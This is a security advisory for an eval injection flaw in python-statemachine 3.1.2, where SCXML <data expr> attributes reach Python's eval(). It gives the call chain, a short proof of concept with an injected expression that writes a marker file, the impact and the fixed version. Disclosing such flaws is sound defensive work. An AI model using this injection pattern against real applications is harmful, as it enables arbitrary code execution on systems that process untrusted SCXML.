GHSA-v4jc-pm6r-3vj8
python-statemachine SCXML <data expr> Eval Injection
상세
### Summary
python-statemachine 3.1.2 evaluates `<data expr="...">` attributes in SCXML documents using Python's `eval()`. Any application that passes attacker-controlled SCXML content to `SCXMLProcessor` is vulnerable to arbitrary code execution in the context of the hosting process.
### Details
`SCXMLProcessor.parse_scxml_file()` processes SCXML documents and evaluates `<data>` element `expr` attributes via the following call chain:
``` SCXMLProcessor.parse_scxml_file() SCXMLProcessor.process_definition() create_datamodel_action_callable() _create_dataitem_callable() _eval() eval() ```
`_eval()` calls Python's built-in `eval()` directly on the expression string without sandboxing or restriction.
### PoC
``` 1. Install: pip install python-statemachine==3.1.2
2. Create an SCXML file containing: <data id="x" expr="__import__('pathlib').Path('marker.txt').write_text('pwned')"/>
3. Run: SCXMLProcessor.parse_scxml_file(DATA_EXPR_CHART) SCXMLProcessor.start()
4. During start(), <data expr> reaches _eval(), which calls eval().
5. Result: data_marker_before_start: False data_marker_after_start: True success: True ```
### Impact
This is an eval injection vulnerability (CWE-95). Remote or local code execution depending on whether the consuming application accepts SCXML content from remote users, uploaded files, configuration, plugins, or other untrusted sources.
이 버전이 영향받나요?
사용 중인 패키지 버전을 입력하면 즉시 평가합니다.
영향 패키지
3.0.0 수정 버전: 3.2.0 pip install --upgrade 'python-statemachine>=3.2.0' 참고
- https://github.com/fgmacedo/python-statemachine/security/advisories/GHSA-v4jc-pm6r-3vj8 [WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2026-47103 [ADVISORY]
- https://github.com/fgmacedo/python-statemachine [PACKAGE]
- https://github.com/fgmacedo/python-statemachine/releases/tag/v3.2.0 [WEB]
- https://www.vulncheck.com/advisories/python-statemachine-rce-via-scxml-eval-injection [WEB]